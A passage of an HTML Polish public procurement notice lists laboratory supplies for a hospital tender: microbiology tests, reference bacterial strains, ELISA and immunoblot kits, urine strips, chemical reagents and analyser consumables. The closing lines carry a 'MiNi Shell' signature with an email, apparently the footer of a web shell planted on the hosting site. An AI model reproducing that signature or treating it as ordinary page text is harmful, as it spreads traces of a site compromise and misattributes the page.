<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5.Test immunochromatograficzny do wykrywania antygenu Helicobacter pylori w kale, testy pakowane pojedynczo, op. max./ 20 szt.- szt	100
zgodnie  załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczepy wzorcowe:
Staphylococcus aureus ATCC 29213-	szt	4
 zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.2.Haemophilus nfluenzae NCTC 8468 - 	szt	4
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.3. Haemophilus influenzae ATCC 49247 szt	4
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.4.Streptococcus pneumoniae ATCC 49619-	szt	4
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet III ZADANIE I
IMMUNOCHEMICZNE TESTY DIAGNOSTYCZNE  ANA/ANCA WRAZ Z DZIERŻAWĄ MIKROSKOPU FLUOROESCENCYJNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.ANA-Hep przeciwciała przeciwjądrowe	test	900
2.ANCA przeciwciała antygenom neutrofili	test	150
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet III 
ZADANIE II - IMMUNOCHEMICZNE TESTY DIAGNOSTYCZNE ELISA WRAZ Z DZIERŻAWĄ SPRZĘTU I OPROGRAMOWANIA DO WYKONANIA TESTÓW ELISA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przeciwciała anty-CCP w klasie Ig G	96 testów	8
2.Przeciwciała przeciw Borrelia w klasie Ig M	96 testów	15
3.Przeciwciała przeciw Borrelia w klasie Ig G	96 testów	16
4.Przeciwciała przeciw t-TG w klasie Ig A	96 testów	4
5.Przeciwciała przeciw t-TG w klasie Ig G	96 testów	3
6.GAF 3X Gliadin IgA ELISA	96 testów	2
7.GAF 3X Gliadin IgG ELISA	96 testów	2
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet III 
ZADANIE III - TESTY DIAGNOSTYCZNE TYPU WESTERN IMUNOBLOT WRAZ DZIERŻAWĄ SPRZĘTU I OPROGRAMOWANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Alergia: Ig E swoiste - panel wziewny	test	96
2	Alergia: Ig E swoiste - panel pediatryczny	test	304
3	Alergia: Ig E swoiste - panel pokarmowy	test	64
4	Alergia: Ig E swoiste - panel jady owadów	test	16
5	Borrelia - test potwierdzenia Western blot - IgM	test	320
6	Borrelia - test potwierdzenia Western blot - IgG	test	304
7	TORCH Profile IgM EUROLINE	test	32
8	TORCH Profile IgG EUROLINE	test	32
9	Przeciwciała ANCA typu blot (anty PR3, MPO)	test	32
10	Profil ANA-3 EUROLINE 	test	112
zgodnie z załacznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET IV - TESTY DIAGNOSTYCZNE KASETKOWE I PASKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Paski testowe CLINITEC	pasek	4000
2	Białko Bence-Jones w moczu	pasek	40
3	Krew utajona w kale	kasetka	390
4	Giardia lamblia w kale	pasek	550
5	Glukoza i ketony w moczu	pasek	200
6	Test ciążowy w moczu	pasek	60
7	Narkotyki + leki w moczu (min. 10 parametrowe)	kasetka	130
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET V - ZŁOŻE JONOWYMIENNE DO STACJI UZDATNIANIA WODY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Złoże jonowymienne MIX-BAD typ MB 400 	op (0,7l)	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET VI     ODCZYNNIKI CHEMICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Fenol	kg	1
2	Metanol	L	3
3	Kwas solny	Kg	2
4	Kwas octowy 80%	L	1
5	Kwas 5-sulfosalicylowy	Kg	1
6	Sodu siarczan bezwodny	Kg	1
7	N-acetylo-Lcysteina	250 g	1
8	Dithiothreitol	Op=1g	2
9	PBS Tablets	Op.=10 tabletek	1
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PAKIET VII - ODCZYNNIKI GIEMSY I MAY-GRUNWALDA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Odczynniki Giemsy	1L	2
2	Odczynniki May-Grunwalda	1L	7
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PAKIET VIII
ZESTAWY DO BADANIA KAMIENI MOCZOWYCH I AKTYWNOŚCI FOSFATAZY ZASADOWEJ GRANULOCYTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.zestaw do badania aktywności fosfatazy zasadowej w granulocytach	Pełna proceduro barwienia	24
2.Zestaw odczynników do badania składu kamieni moczowych	Oznaczenie każdego składnika kamieni	100
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PAKIET IX - TESTY DIAGNOSTYCZNE DO DZIERŻAWIONYCH ANALIZATORÓW SYNCHRON CX-5 ORAZ ACCESS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kreatynina	Op (2x300 testów)	20
2	Alkohol 	Op (300 testów)	3
3	Vitamina B12
	op (100 testów)	4
4	 Vitamina B12 Kalibrator
	op	2
5	ANTYGEN CEA	op (100 testów)	12
6	ANTYGEN CA 125	op (100 testów)	6
7	CA 19.9	Op (100 testów	6
8	CEA Calibrator	op	1
9	CA 125 Calibrator	op	1
10	CA 19.9 Calibrator	op	1
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PAKIET X
ODCZYNNIKI, KALIBRATORY, MATERIAŁY KONTROLNE I ZUŻYWALNE DO BADAŃ LABORATORYJNYCH Z ZAKRESU HEMOSTAZY WRAZ Z DZIERŻAWĄ ANALIZATORA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie  z załacznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com